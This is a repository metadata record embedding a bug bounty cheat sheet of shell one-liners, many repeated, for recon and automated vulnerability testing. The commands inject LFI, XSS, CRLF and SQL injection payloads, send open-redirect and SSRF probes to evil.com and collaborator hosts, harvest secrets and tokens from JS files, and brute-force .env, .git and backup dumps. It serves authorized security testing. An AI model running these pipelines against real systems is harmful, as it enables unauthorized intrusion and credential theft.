{"id":26067387,"url":"https://github.com/yogsec/onelinerbounty","last_synced_at":"2026-03-07T18:31:06.422Z","repository":{"id":281067084,"uuid":"944099168","full_name":"yogsec/OneLinerBounty","owner":"yogsec","description":"OneLinerBounty is a collection of quick, actionable bug bounty tips in one-liner format. Perfect for bug hunters looking to boost their skills and efficiency. Contribute your own tips or use these to streamline your workflow and uncover more vulnerabilities. #BugBounty #Cybersecurity #HackTips #SecurityResearch #OneLinerBugBounty #OneLinerBounty","archived":false,"fork":false,"pushed_at":"2026-01-25T10:50:56.000Z","size":13796,"stargazers_count":55,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-01-26T01:36:14.863Z","etag":null,"topics":["bug","bugbounty","bugbountytips","burp-extensions","burpsuite","cyber-security","cybersecurity","cybersecurity-tools","cybersecuritytips","ethicalhacking","hacker","hackerone","hackers","hacking","hacking-tools","nmap","onelinerbugbounty","osint","owasp"],"latest_commit_sha":null,"homepage":"https://linktr.ee/yogsec","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yogsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":"yogsec","tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":null,"buy_me_a_coffee":null,"thanks_dev":null,"custom":null}},"created_at":"2025-03-06T19:31:49.000Z","updated_at":"2026-01-25T10:51:00.000Z","dependencies_parsed_at":"2025-03-06T20:38:47.105Z","dependency_job_id":null,"html_url":"https://github.com/yogsec/OneLinerBounty","commit_stats":null,"previous_names":["yogsec/onelinerbounty"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/yogsec/OneLinerBounty","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yogsec","download_url":"https://codeload.github.com/yogsec/OneLinerBounty/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30226245,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-07T18:12:09.766Z","status":"ssl_error","status_checked_at":"2026-03-07T18:11:58.786Z","response_time":53,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug","bugbounty","bugbountytips","burp-extensions","burpsuite","cyber-security","cybersecurity","cybersecurity-tools","cybersecuritytips","ethicalhacking","hacker","hackerone","hackers","hacking","hacking-tools","nmap","onelinerbugbounty","osint","owasp"],"created_at":"2025-03-08T21:44:22.829Z","updated_at":"2026-03-07T18:31:06.226Z","avatar_url":"https://github.com/yogsec.png","language":null,"readme":" \u003ch1\u003e # One Liner Bug Bounty CheatSheet πŸš€\u003c/h1\u003e\n\n![https://giphy.com/gifs/funny-lol-college-6xE1FNcorRInS](https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExN2ZtZDI4eGJ1dmFmbWx0ZGRqNmRiMWNkcHBydTc1cWJqOXRheHp0eCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/6xE1FNcorRInS/giphy.gif)\n\nThis repository is a collection of concise, actionable bug bounty tips, each carefully crafted into a single line. Whether you're just getting started or you're a seasoned bug hunter, these tips will help you level up your skills, save time, and uncover more vulnerabilities. πŸ’‘\n\n## Why OneLiners?\n\nIn the world of bug bounty hunting, time is precious. Short, impactful tips can make all the difference. Here, you'll find quick insights that can easily be referenced when you're diving into a new target, testing a feature, or looking to refine your methodology. πŸ”\n\n---\n\n## 🌟 Let's Connect!\n\nHello, Hacker! πŸ‘‹ We'd love to stay connected with you. Reach out to us on any of these platforms and let's build something amazing together:\n \nπŸ“œ **Linktree:** [https://linktr.ee/yogsec](https://linktr.ee/yogsec) \nπŸ“· **Instagram:** [https://www.instagram.com/yogsec.io/](https://www.instagram.com/yogsec.io/) \n🐦 **Twitter (X):** [https://x.com/yogsec](https://x.com/yogsec) \nπŸ‘¨β€πŸ’Ό **Personal LinkedIn:** [https://www.linkedin.com/in/cybersecurity-pentester/](https://www.linkedin.com/in/cybersecurity-pentester/) \nπŸ“§ **Email:** abhinavsingwal@gmail.com\n\n## β˜• Buy Me a Coffee\n\nIf you find our work helpful and would like to support us, consider buying us a coffee. Your support keeps us motivated and helps us create more awesome content. ❀️\n\nβ˜• **Support Us Here:** [https://buymeacoffee.com/yogsec](https://buymeacoffee.com/yogsec)\n\n\n---\n\n# OneLinerBounty\n\n## Quick Bug Bounty Tips\n\nHere are some essential one-liners for various bug bounty tasks:\n\n### Misconfigurations, Tech Detection, and Common Bugs\nIf you want wider coverage, like misconfigurations, tech detection, and common bugs, change the template path to `-t vulnerabilities/`:\n\n```bash\ncat urls.txt | httpx -silent -mc 200 | nuclei -silent -t vulnerabilities/ -o results.txt\n```\n\n### Subdomain Takeovers - Quick Check\nWant to check for subdomain takeovers in one line?\n\n```bash\nsubfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt\n```\n\n### Subdomain Discovery + Live Check\nFor subdomain discovery with live check:\n\n```bash\nsubfinder -d target.com | httpx -silent -mc 200\n```\n\n### Subdomain Takeover Detection\nDetect subdomain takeovers:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Directory Bruteforce (Content Discovery)\nFor directory bruteforce:\n\n```bash\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200\n```\n\n### Find Open Redirects (Quick Scan)\nTo quickly find open redirects:\n\n```bash\ncat urls.txt | gf redirect | httpx -silent\n```\n\n### XSS Detection (Using Dalfox)\nFor XSS detection using Dalfox:\n\n```bash\ncat urls.txt | dalfox pipe --skip-bav --only-poc\n```\n\n### SQL Injection Discovery\nFor SQL Injection discovery:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Subdomain Takeovers - Quick Check\nWant to check for subdomain takeovers in one line?\n\n```bash\nsubfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt\n```\n\n### Subdomain Discovery + Live Check\nFor subdomain discovery with live check:\n\n```bash\nsubfinder -d target.com | httpx -silent -mc 200\n```\n\n### Subdomain Takeover Detection\nDetect subdomain takeovers:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Directory Bruteforce (Content Discovery)\nFor directory bruteforce:\n\n```bash\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200\n```\n\n### Find Open Redirects (Quick Scan)\nTo quickly find open redirects:\n\n```bash\ncat urls.txt | gf redirect | httpx -silent\n```\n\n### XSS Detection (Using Dalfox)\nFor XSS detection using Dalfox:\n\n```bash\ncat urls.txt | dalfox pipe --skip-bav --only-poc\n```\n\n### SQL Injection Discovery\nFor SQL Injection discovery:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Find Sensitive Files (Backup, Config, etc.)\nTo find sensitive files like backups and configuration files:\n\n```bash\ncat urls.txt | waybackurls | grep -Ei '\\.(bak|old|backup|log|env|sql|config)$'\n```\n\n### CORS Misconfiguration Detection\nTo detect CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Detect Technologies + Possible CVEs\nTo detect technologies and possible CVEs:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Parameter Discovery (for further testing)\nTo discover parameters for further testing:\n\n```bash\ncat urls.txt | waybackurls | uro | grep '?'\n```\n\n### Full Recon Chain (Subdomains + Live Check + Technologies + Titles)\nFor full recon chain:\n\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect\n```\n\n### Subdomain Enum + Ports Scan (Fast)\nFor a fast subdomain enumeration and port scan:\n\n```bash\nsubfinder -d target.com | naabu -silent -top-ports 1000\n```\n\n### All URLs from Wayback, CommonCrawl, and AlienVault\nTo get all URLs from Wayback, CommonCrawl, and AlienVault:\n\n```bash\ngau target.com | tee urls.txt\n```\n\n### Find Secrets in JS Files\nTo find secrets in JS files:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr \"[:space:]\" \"\\n\" | grep -Ei \"(api|key|token|secret|password|passwd|authorization)=\"'\n```\n\n### Find Open AWS Buckets\nTo find open AWS buckets:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml\n```\n\n### Find Misconfigured Login Panels\nTo find misconfigured login panels:\n\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### Check All Parameters for Reflected XSS\nTo check all parameters for reflected XSS:\n\n```bash\ncat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc\n```\n\n### Check for Exposed Git Repositories\nTo check for exposed Git repositories:\n\n```bash\ncat urls.txt | httpx -silent -path \"/.git/config\" -mc 200\n```\n\n### Extract All Parameters from URLs (for manual testing)\nTo extract all parameters from URLs for manual testing:\n\n```bash\ncat urls.txt | uro | grep '?'\n```\n\n### Takeover Domains from Subdomain List\nTo perform takeover checks on domains from a subdomain list:\n\n```bash\ncat subdomains.txt | nuclei -silent -t takeovers/\n```\n\n### Find CVEs Based on Technology\nTo find CVEs based on technology:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Find Top Ports + Services for All Subdomains (Recon + Port Scan)\nTo find the top ports and services for all subdomains:\n\n```bash\nsubfinder -d target.com | naabu -top-ports 1000 -silent\n```\n\n### Extract All Endpoints from JS Files (JS Analysis)\nTo extract all endpoints from JS files for analysis:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE \"(/api/v[0-9]+/[^\\\"'\\'']+|/[a-zA-Z0-9_/.-]+\\.(php|aspx|jsp|html|json|xml|txt))\"'\n```\n\n### Subdomain Discovery + Live Check\nFor subdomain discovery with live check:\n\n```bash\nsubfinder -d target.com | httpx -silent -mc 200\n```\n\n### Subdomain Takeover Detection\nDetect subdomain takeovers:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Directory Bruteforce (Content Discovery)\nFor directory bruteforce:\n\n```bash\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200\n```\n\n### Find Open Redirects (Quick Scan)\nTo quickly find open redirects:\n\n```bash\ncat urls.txt | gf redirect | httpx -silent\n```\n\n### XSS Detection (Using Dalfox)\nFor XSS detection using Dalfox:\n\n```bash\ncat urls.txt | dalfox pipe --skip-bav --only-poc\n```\n\n### SQL Injection Discovery\nFor SQL Injection discovery:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Find Sensitive Files (Backup, Config, etc.)\nTo find sensitive files like backups and configuration files:\n\n```bash\ncat urls.txt | waybackurls | grep -Ei '\\.(bak|old|backup|log|env|sql|config)$'\n```\n\n### CORS Misconfiguration Detection\nTo detect CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Detect Technologies + Possible CVEs\nTo detect technologies and possible CVEs:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Parameter Discovery (for further testing)\nTo discover parameters for further testing:\n\n```bash\ncat urls.txt | waybackurls | uro | grep '?'\n```\n\n### Full Recon Chain (Subdomains + Live Check + Technologies + Titles)\nFor full recon chain:\n\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect\n```\n\n### Subdomain Enum + Ports Scan (Fast)\nFor a fast subdomain enumeration and port scan:\n\n```bash\nsubfinder -d target.com | naabu -silent -top-ports 1000\n```\n\n### All URLs from Wayback, CommonCrawl, and AlienVault\nTo get all URLs from Wayback, CommonCrawl, and AlienVault:\n\n```bash\ngau target.com | tee urls.txt\n```\n\n### Find Secrets in JS Files\nTo find secrets in JS files:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr \"[:space:]\" \"\\n\" | grep -Ei \"(api|key|token|secret|password|passwd|authorization)=\"'\n```\n\n### Find Open AWS Buckets\nTo find open AWS buckets:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml\n```\n\n### Find Misconfigured Login Panels\nTo find misconfigured login panels:\n\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### Check All Parameters for Reflected XSS\nTo check all parameters for reflected XSS:\n\n```bash\ncat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc\n```\n\n### Check for Exposed Git Repositories\nTo check for exposed Git repositories:\n\n```bash\ncat urls.txt | httpx -silent -path \"/.git/config\" -mc 200\n```\n\n### Extract All Parameters from URLs (for manual testing)\nTo extract all parameters from URLs for manual testing:\n\n```bash\ncat urls.txt | uro | grep '?'\n```\n\n### Takeover Domains from Subdomain List\nTo perform takeover checks on domains from a subdomain list:\n\n```bash\ncat subdomains.txt | nuclei -silent -t takeovers/\n```\n\n### Find CVEs Based on Technology\nTo find CVEs based on technology:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Find Top Ports + Services for All Subdomains (Recon + Port Scan)\nTo find the top ports and services for all subdomains:\n\n```bash\nsubfinder -d target.com | naabu -top-ports 1000 -silent\n```\n\n### Extract All Endpoints from JS Files (JS Analysis)\nTo extract all endpoints from JS files for analysis:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE \"(/api/v[0-9]+/[^\\\"'\\'']+|/[a-zA-Z0-9_/.-]+\\.(php|aspx|jsp|html|json|xml|txt))\"'\n```\n\n### Scan for Backup Files (Old Config/DB Dumps)\nTo scan for backup files, old config, or DB dumps:\n\n```bash\ncat urls.txt | httpx -silent -path-list \u003c(echo -e \"/.env\\n/config.php\\n/backup.zip\\n/database.sql\\n/admin.bak\") -mc 200\n```\n\n### Find Open .git Folders (Source Leak)\nTo find open `.git` folders:\n\n```bash\ncat subdomains.txt | httpx -silent -path \"/.git/config\" -mc 200\n```\n\n### WordPress Scan (Detect Plugins, Themes, etc.)\nFor WordPress scan to detect plugins, themes, etc.:\n\n```bash\ncat urls.txt | nuclei -silent -t technologies/wordpress/\n```\n\n### Hunt for CRLF Injection (Newline Injection)\nTo hunt for CRLF injection:\n\n```bash\ncat urls.txt | gf crlf | qsreplace '%0d%0aTestHeader:TestValue' | httpx -silent -hdrs\n```\n\n### Detect CORS Misconfigurations (Very Common Bug)\nTo detect CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Test All URLs for LFI (Local File Inclusion)\nTo test all URLs for LFI:\n\n```bash\ncat urls.txt | gf lfi | qsreplace '/etc/passwd' | httpx -silent -mc 200\n```\n\n### Find Information Disclosure via Backup Files\nTo find information disclosure via backup files:\n\n```bash\ncat urls.txt | waybackurls | grep -Ei '\\.(bak|old|backup|log|sql|env|zip|tar|gz|rar)$' | httpx -silent -mc 200\n```\n\n### Find Exposed Panels (Admin, Login, etc.)\nTo find exposed admin/login panels:\n\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### Full JS Hunting + Secrets Scan (for frontend leaks)\nFor full JS hunting and secrets scan:\n\n```bash\ngau target.com | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'echo {} \u0026\u0026 curl -s {} | tr -d \"\\r\" | grep -E -i \"(api[_-]?key|secret|token|auth|password|passwd|client[_-]?id|client[_-]?secret)=\"'\n```\n\n### Search for Open Redirects (URL Redirect issues)\nTo search for open redirects:\n\n```bash\ncat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -mc 302,301 -fr 'evil.com'\n```\n\n### Quick Scan for SQL Injection\nFor a quick SQL injection scan:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Find Interesting Endpoints (Like admin, login, debug, etc.)\nTo find interesting endpoints like admin, login, debug, etc.:\n\n```bash\ngau target.com | grep -Ei '/(admin|login|debug|test|backup|panel|dashboard)'\n```\n\n### Check for Exposed Config Files (like .env, .git, .DS_Store)\nTo check for exposed config files:\n\n```bash\ncat urls.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/.git/config\\n/.DS_Store\\n/config.php\\n/config.json') -mc 200\n```\n\n### Scan for CVE in All Subdomains\nTo scan for CVEs in all subdomains:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t cves/\n```\n\n### Full Backup File Search (All extensions that leak data)\nTo search for all extensions that leak backup files:\n\n```bash\ngau target.com | grep -Ei '\\.(bak|old|backup|sql|log|tar|zip|gz|rar|swp|env|config)$' | httpx -silent -mc 200\n```\n\n### Check for CORS Misconfigurations\nTo check for CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Scan for Open Admin Panels (Exposed Panels)\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### ALL-IN-ONE MEGA SCAN πŸ’£ (Subdomain + Alive + CVE Scan + Panels)\n```bash\nsubfinder -d target.com | httpx -silent -mc 200 | tee alive.txt | nuclei -silent -t cves/,exposed-panels/\n```\n\n### All-in-One Recon Pipeline (Subdomains β†’ Probing β†’ Ports β†’ Tech Detection β†’ Titles)\n```bash\nsubfinder -d target.com | anew subs.txt \u0026\u0026 cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | anew alive.txt\n```\n\n### Mass Fetch JS Files + Find Secrets + Endpoints + Tokens\n```bash\ncat alive.txt | hakrawler -subs | grep '\\.js$' | anew jsfiles.txt \u0026\u0026 cat jsfiles.txt | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | egrep -i \"(api|key|token|secret|password|passwd|authorization|bearer|client_id|client_secret)\"' | tee secrets.txt\n```\n\n### Check for Open Redirects Across All Params (with Payload Injection)\n```bash\ncat alive.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -mc 302,301\n```\n\n### Automatic Vulnerability Scan (Subdomains to CVE Detection + Misconfigs)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t cves/,misconfiguration/\n```\n\n### Backup Files Bruteforce Across All Hosts\n```bash\ncat alive.txt | httpx -silent -path-list \u003c(echo -e \"/.git/config\\n/.env\\n/database.sql\\n/backup.zip\\n/config.php\\n/wp-config.php\") -mc 200 | tee backups.txt\n```\n\n### Check for Parameter-Based XSS (Direct Injection Testing)\n```bash\ncat alive.txt | hakrawler -subs -depth 2 | gf xss | qsreplace '\"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e' | httpx -silent -fr 'alert(document.domain)'\n```\n\n### Automated LFI Discovery (Common Payloads)\n```bash\ncat alive.txt | gf lfi | qsreplace '../../../../../../etc/passwd' | httpx -silent -mc 200\n```\n\n### Fuzz Parameters \u0026 Check Reflections (for XSS \u0026 Injection Discovery)\n```bash\ncat alive.txt | waybackurls | gf params | uro | qsreplace FUZZ | ffuf -u FUZZ -w wordlists/payloads/xss.txt -fr 'FUZZ'\n```\n\n### Subdomain Takeover Detection (Live Scan + Detection)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Full Asset Discovery + Technology Analysis + Title Collection\n```bash\nassetfinder --subs-only target.com | httpx -silent -title -tech-detect | tee assets_with_tech.txt\n```\n\n### Mega Pipeline - Subdomains β†’ URLs β†’ Parameters β†’ XSS/SQL/Secrets\n```bash\nsubfinder -d target.com | anew subs.txt \u0026\u0026 cat subs.txt | httpx -silent | hakrawler -subs -depth 2 | anew urls.txt \u0026\u0026 cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc | tee xss_poc.txt \u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | egrep -i \"(api|key|token|secret|password|passwd|auth)\"' | tee secrets.txt\n```\n\n### Ultimate Recon Monster (Subdomains β†’ Probing β†’ Ports β†’ Technologies β†’ CVEs)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_scan.txt \u0026\u0026 cat tech_scan.txt | nuclei -silent -t cves/\n```\n\n### Automated Asset Hunting + JS Analysis + Secret Finder\n```bash\nsubfinder -d target.com | httpx -silent -mc 200 | hakrawler -subs -depth 3 -plain | anew urls.txt \u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | gf secrets | tee -a secrets.txt'\n```\n\n### Mass Fuzz Every Parameter with XSS, LFI, SQLi Payloads (Ultimate Param Attacker)\n```bash\ncat urls.txt | gf xss,lfi,sqli | uro | qsreplace FUZZ | ffuf -u FUZZ -w xss.txt,lfi.txt,sqli.txt -fr \"FUZZ\" | tee param_fuzz.txt\n```\n\n### Subdomain Takeover, DNS Hijack, Misconfig Scan - All In One\n```bash\nsubfinder -d target.com | dnsx -a -resp-only -silent | nuclei -silent -t takeovers/,dns/\n```\n\n### Automatic Full Backup File Bruteforcing Across All Hosts (Super Leaks Finder)\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backups_found.txt\n```\n\n### Deep Directory Brute Force (Smart Recursive Finder)\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | xargs -I{} gobuster dir -u {} -w big_wordlist.txt -t 50 -o gobuster_output.txt\n```\n\n### Blind SSRF Auto-Detection in All Parameters\n```bash\ncat urls.txt | gf ssrf | qsreplace 'http://canarytoken.com' | httpx -silent -mc 200 -fr 'canarytoken'\n```\n\n### Mega Wordlist Generator from Wayback + JS + HTML Comments + Robots.txt + Sitemap.xml\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | hakrawler -subs -depth 2 | anew urls.txt \u0026\u0026 cat urls.txt | gf wordlist | anew wordlist.txt\n```\n\n### Full Sitemap \u0026 Robots Extraction Across Subdomains\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e \"/robots.txt\\n/sitemap.xml\") -mc 200 | tee robots_sitemaps.txt\n```\n\n### CRLF Injection Full Auto Discovery \u0026 Exploit\n```bash\ncat urls.txt | gf crlf | qsreplace '%0d%0aTest-Header: InjectedValue' | httpx -silent -hdrs | tee crlf_vulns.txt\n```\n\n### CSP Analyzer Across All Hosts (Misconfig Finder)\n```bash\ncat alive.txt | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_misconfig.txt\n```\n\n### Full JS Endpoint Extraction + Sensitive Function Search (eval, document.write, etc.)\n```bash\ncat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | grep -E -o \"(http|https)://[^\\\" ]+\" | anew js_endpoints.txt \u0026\u0026 curl -s {} | egrep -i \"(document\\.write|eval|innerHTML|fetch|XMLHttpRequest|localStorage|sessionStorage|cookie)\" | tee -a sensitive_js.txt'\n```\n\n### Recon + Full Vuln Scan + CORS, Headers, CVE, Misconfig, Secrets β€” One Command to Rule Them All\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee alive.txt \u0026\u0026 cat alive.txt | nuclei -silent -t cves/,misconfiguration/,exposures/,default-logins/,panels/ | tee findings.txt \u0026\u0026 cat alive.txt | hakrawler -subs -depth 3 | anew urls.txt \u0026\u0026 cat urls.txt | gf xss,sqli,lfi,ssrf | dalfox pipe --skip-bav --only-poc | tee vulns.txt \u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | gf secrets' | tee secrets_found.txt\n```\n\n### Subdomain Takeover + Open Redirect Chain (Full Passive β†’ Exploit Ready)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/,redirect/ -o takeover_redirects.txt\n```\n\n### Full Parameter Discovery + Automated Fuzzing (XSS, SQLi, LFI, SSRF)\n```bash\ngau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr \"FUZZ\" | tee param_vulns.txt\n```\n\n### Auto Search for Backup Files + Leaked Configs (All Subdomains)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backup_leaks.txt\n```\n\n### Deep Web Archive Scraping + JS Secrets Extraction\n```bash\ngau --subs target.com | grep '\\.js$' | httpx -silent -status-code -mc 200 | xargs -I{} bash -c 'curl -s {} | gf secrets' | tee js_secrets.txt\n```\n\n### Auto-Dump All Endpoints from Wayback, JS, Robots.txt, Sitemap.xml\n```bash\nsubfinder -d target.com | anew subs.txt \u0026\u0026 cat subs.txt | httpx -silent -path-list \u003c(echo -e \"/robots.txt\\n/sitemap.xml\") -mc 200 | hakrawler -subs -depth 3 | anew all_urls.txt\n```\n\n### CSP Bypass Finder (Auto Fetch CSP Across All Subdomains)\n```bash\nsubfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_policies.txt\n```\n\n### Automatic SSRF Detection (Using Collaborator/Canarytokens)\n```bash\ngau target.com | gf ssrf | qsreplace 'http://your-collaborator-url.burpcollaborator.net' | httpx -silent\n```\n\n### Deep Search for Hidden Panels + Config Pages (Across All Ports)\n```bash\nsubfinder -d target.com | httpx -silent -ports 80,443,8080,8443 | nuclei -silent -t panels/,exposures/configs/ -o exposed_panels.txt\n```\n\n### Entire Subdomain + Tech Stack + CVE + Misconfig Scan (Full Recon Bomb)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | nuclei -silent -t cves/,misconfiguration/ -o full_scan.txt\n```\n\n### Auto-Scrape HTML Comments for Sensitive Info\n```bash\ncat all_urls.txt | httpx -silent -mc 200 -fr 'text/html' -body | grep -iE \"\u003c!--.*--\u003e\" | tee html_comments.txt\n```\n\n### URL Extraction from JS Files (Full Recursive)\n```bash\ncat all_urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | grep -Eo \"(https?|ftp)://[a-zA-Z0-9./?=_-]*\"' | anew extracted_urls.txt\n```\n\n### Super Bruteforce for Backup + Git + Env + SQL Dumps\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e \"/.git/\\n/.env\\n/database.sql\\n/backup.zip\\n/config.yml\") -mc 200 | tee sensitive_files.txt\n```\n\n### Advanced Open Redirect Scanner Across All Params\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\n### Full Headers Security Misconfig Audit\n```bash\nsubfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | nuclei -silent -t misconfiguration/http-headers/ -o header_issues.txt\n```\n\n### Auto-Gather All IPs, ASN, WHOIS for Every Subdomain\n```bash\nsubfinder -d target.com | dnsx -a -resp-only | anew all_ips.txt \u0026\u0026 cat all_ips.txt | xargs -I{} sh -c 'whois {} | grep -iE \"OrgName|NetName|CIDR\"' | tee whois_lookup.txt\n```\n\n### Master Recon + Scan Pipeline (One-Liner)\n```bash\nsubfinder -d target.com | tee subs.txt \u0026\u0026 cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_info.txt \u0026\u0026 cat subs.txt | hakrawler -subs -depth 3 | anew urls.txt \u0026\u0026 cat urls.txt | nuclei -silent -t cves/,misconfiguration/,takeovers/,panels/,redirect/ -o nuclei_findings.txt \u0026\u0026 cat urls.txt | gf xss,sqli,lfi,ssrf,redirect | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/sqli.txt,payloads/lfi.txt,payloads/ssrf.txt -fr \"FUZZ\" | tee param_scan.txt\n```\n\n### Additional Specific Recon + Vulnerability Scanning Commands\n\n#### Directory Traversal (Across All Endpoints)\n```bash\ncat all_urls.txt | gf lfi | qsreplace '../../../../../etc/passwd' | httpx 